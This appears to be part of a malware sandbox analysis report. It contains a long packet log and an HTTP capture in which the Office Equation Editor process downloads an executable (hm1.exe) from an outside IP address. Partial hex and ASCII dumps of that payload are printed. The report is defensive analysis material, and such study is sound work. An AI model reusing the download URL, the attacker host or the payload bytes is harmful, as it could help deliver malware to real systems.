Jan 27, 2021 20:03:03.603497982 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603508949 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603511095 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603521109 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603524923 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603539944 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603555918 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603562117 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603568077 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603579044 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603594065 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603595972 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603604078 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603609085 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603611946 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603614092 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603619099 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603629112 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603636980 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603646040 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603650093 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603661060 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603676081 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603682995 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603689909 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603698015 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603704929 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603705883 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603712082 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603720903 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603725910 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603739977 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603740931 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603760004 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603766918 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603815079 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603899002 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603920937 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603943110 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603946924 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603960037 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603965998 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603984118 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603986979 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604003906 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604007959 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604017973 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604023933 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604043961 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604048014 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604063034 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604069948 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604091883 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604099035 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604110003 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604110956 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604130983 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604130983 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604149103 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604151964 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604168892 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604173899 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604191065 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604196072 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604211092 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604217052 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604238987 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604244947 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604253054 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604260921 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604276896 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604281902 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604299068 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604301929 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604321003 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604325056 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604343891 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604347944 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604362965 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604363918 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604382992 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604387045 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604396105 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604399920 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604423046 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604440928 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604450941 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604465008 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604485035 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604486942 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604510069 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604511976 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604521990 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604532957 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604548931 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604556084 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604581118 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604587078 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604600906 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604604959 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604621887 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604630947 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604652882 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604657888 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604669094 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604671955 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604685068 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604688883 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604701042 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604706049 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604717016 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604717016 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604733944 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604737997 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604754925 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604757071 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604767084 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604769945 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604785919 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604803085 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604804039 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604809046 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604820967 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604825020 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604835987 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604839087 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604851961 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604855061 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604875088 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604880095 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604892969 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604893923 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604909897 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604909897 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.604923964 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.604947090 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.607846022 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.607863903 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.607878923 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.607893944 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.607916117 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.607970953 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.607986927 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608750105 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608784914 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608793020 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608803988 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608807087 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608822107 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608824015 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608845949 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608850956 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608860970 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608865976 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608882904 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608885050 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608897924 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608906031 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608922005 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608926058 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608942032 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.608943939 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608963013 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608972073 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.608978033 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609000921 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609019995 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609025002 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609040022 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609042883 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609057903 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609066010 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609081984 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609091043 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609112024 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609113932 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609128952 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609133005 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609148026 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609154940 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609174967 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609185934 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609191895 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609194994 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609211922 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609215021 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609221935 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609231949 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609255075 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609267950 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609276056 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609277010 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609292030 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609297991 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609312057 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609316111 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609332085 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609335899 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609353065 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609357119 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609373093 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609375000 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609407902 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609425068 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609427929 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609445095 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609445095 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609463930 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609474897 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609486103 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609505892 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609508038 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609510899 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609515905 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609519958 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609524965 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609533072 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609535933 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609546900 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609559059 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609570026 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609580994 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609592915 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.609599113 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609611034 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609616995 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.609628916 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.613209963 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:04.084516048 CET	49165	80	192.168.2.22	18.194.54.219

HTTP Request Dependency Graph

18.194.54.219

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	18.194.54.219	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 20:03:03.212902069 CET	0	OUT	GET /wows/hm1.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 18.194.54.219 Connection: Keep-Alive
Jan 27, 2021 20:03:03.254192114 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 27 Jan 2021 19:02:53 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Last-Modified: Wed, 27 Jan 2021 13:44:17 GMT ETag: "9ac00-5b9e1f7b0f5e7" Accept-Ranges: bytes Content-Length: 633856 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 6d 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 09 00 00 08 00 00 00 00 00 00 2e c1 09 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c0 09 00 57 00 00 00 00 e0 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a1 09 00 00 20 00 00 00 a2 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 e0 09 00 00 06 00 00 00 a4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 aa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c1 09 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 7e 08 00 f0 41 01 00 03 00 00 00 01 00 00 06 ec 8e 02 00 f8 ef 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 01 01 00 00 01 00 00 11 2b 02 26 16 00 38 e8 00 00 00 02 16 38 c7 00 00 00 00 2b 35 06 1f 56 61 0a 2b 1e 07 1f 60 61 0b 07 1f 53 59 45 04 00 00 00 05 00 00 00 10 00 00 00 17 00 00 00 4d 00 00 00 1f 35 0b 2b dd d0 01 00 00 06 26 1f 33 0b 2b d2 17 0a 1f 36 0b 2b cb 06 1f 4f 59 45 0a 00 00 00 07 00 00 00 0c 00 00 00 19 00 00 00 27 00 00 00 2f 00 00 00 37 00 00 00 45 00 00 00 4e 00 00 00 68 00 00 00 7f 00 00 00 1f 34 0b 2b 95 2b 8c 00 18 0a 2b 87 d0 03 00 00 06 26 1c 0a 38 7a ff ff ff 02 16 28 07 00 00 0a 19 0a 38 6c ff ff ff 00 1d 0a 38 64 ff ff ff 00 16 0a 38 5c ff ff ff 02 17 28 08 00 00 0a 1b 0a 38 4e ff ff ff 00 1f 0e 0a 38 45 ff ff ff 02 17 28 09 00 00 0a 2b 0a 28 0a 00 00 0a 38 2f ff ff ff 1a 0a 38 2b ff ff ff 02 16 28 0b 00 00 0a 2b 06 00 38 12 ff ff ff 1f 19 0a 38 14 ff ff ff 2a 00 00 00 13 30 02 00 aa 00 00 00 01 00 00 11 2b 02 26 16 00 00 2b 3e 06 1f 5c 61 0a 2b 0f 07 1f 5f 61 38 84 00 00 00 07 1f 5c 58 2b 58 1f 5c 28 e9 01 00 06 0b 2b e7 06 1f 5b 59 45 04 00 00 00 1e 00 00 00 23 00 00 00 53 00 00 00 68 00 00 00 1f fa 0b 2b Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELXm`P. @ @W H.text4 `.rsrc@@.reloc@BH~A0#+&(((o0+&88+5Va+`aSYEM5+&3+6+OYE'/7ENh4+++&8z(8l8d8\(8N8E(+(8/8+(+880+&+>\a+_a8\X+X\(+[YE#Sh+
Jan 27, 2021 20:03:03.254245996 CET	3	IN	Data Raw: c9 16 0a 1f f8 0b 2b c2 d0 01 00 00 06 26 1f 50 28 e9 01 00 06 0b 2b b2 2b a9 00 18 0a 2b a4 02 28 09 00 00 06 6f 12 00 00 06 28 0d 00 00 0a 2b 17 45 04 00 00 00 9d ff ff ff bb ff ff ff c2 ff ff ff d2 ff ff ff 2b 91 1d 0a 38 74 ff ff ff d0 01 00 Data Ascii: +&P(+++(o(+E+8t&+8v8_6+&(0+&s+ Ua+_a8SX+J](+R(+&c(+^XE#5GYo+E
Jan 27, 2021 20:03:03.254286051 CET	4	IN	Data Raw: 06 00 00 04 14 fe 03 0c 08 2c 03 16 2b 03 17 2b 00 2d 3a 7e 06 00 00 04 d0 06 00 00 1b 28 1f 00 00 0a 6f 20 00 00 0a 0d 09 2c 03 16 2b 03 17 2b 00 2d 16 72 01 00 00 70 16 8d 18 00 00 01 28 21 00 00 0a 73 22 00 00 0a 7a 00 00 2b 0c 00 73 23 00 00 Data Ascii: ,++-:~(o ,++-rp(!s"z+s#~(o$+8{+9V8N(+\|u%,++-&+%(&o'&r;p%o'o((!o's)z~
Jan 27, 2021 20:03:03.254340887 CET	6	IN	Data Raw: 00 00 04 2b 00 2a 7a 2b 02 26 16 02 02 7b 0b 00 00 04 28 06 00 00 2b 7d 0b 00 00 04 02 7b 0b 00 00 04 2b 00 2a 7a 2b 02 26 16 02 02 7b 0c 00 00 04 28 07 00 00 2b 7d 0c 00 00 04 02 7b 0c 00 00 04 2b 00 2a 7a 2b 02 26 16 02 02 7b 0d 00 00 04 28 08 Data Ascii: +z+&{(+}{+z+&{(+}{+z+&{(+}{+z+&{(+}{+z+&{(+}{+z+&{(+}{+z+&{(+}{+z+&{(+}
Jan 27, 2021 20:03:03.295118093 CET	7	IN	Data Raw: 2b 06 2b 07 2c ed 2b e8 16 2b 03 17 2b 00 2d 0b 72 71 00 00 70 73 31 00 00 0a 7a 02 02 7c 13 00 00 04 28 1b 00 00 2b 2a 00 13 30 03 00 86 01 00 00 0c 00 00 11 fe 09 00 00 fe 0e 00 00 fe 0c 00 00 20 dc bd 03 59 20 70 70 df 07 61 20 a3 08 4b 24 59 Data Ascii: ++,+++-rqps1z\|(+0 Y ppa K$Y a &XYELq?+_8 Of b c se SsX kjY* wf Y
Jan 27, 2021 20:03:03.295162916 CET	8	IN	Data Raw: d4 00 00 00 07 38 96 00 00 00 16 2b 03 17 2b 00 3a c0 00 00 00 2b 57 09 1f 56 61 0d 2b 21 11 04 1f 7a 61 13 04 11 04 1f 6f 58 45 04 00 00 00 0b 00 00 00 2f 00 00 00 3d 00 00 00 49 00 00 00 1f 76 28 2c 00 00 06 13 04 2b d4 09 1f 50 58 45 04 00 00 Data Ascii: 8++:+WVa+!zaoXE/=Iv(,+PXE'5Oqr(,+s(+:&++7&8+9h8`8erp(o7s88C+8&~+*0
Jan 27, 2021 20:03:03.295213938 CET	10	IN	Data Raw: 1f 71 61 13 05 11 05 1f 70 59 45 05 00 00 00 05 00 00 00 14 00 00 00 1f 00 00 00 25 00 00 00 2e 00 00 00 19 13 05 2b d6 7e 1a 00 00 04 16 fe 01 13 04 18 13 05 2b c7 d0 41 00 00 06 26 16 13 05 2b bc 00 17 13 05 2b b6 11 04 2c 08 1b 13 05 2b ad 16 Data Ascii: qapYE%.+~+A&++,+++-_(AsAoB+!}amYE%+?&+++,++-(C+98+8~+*
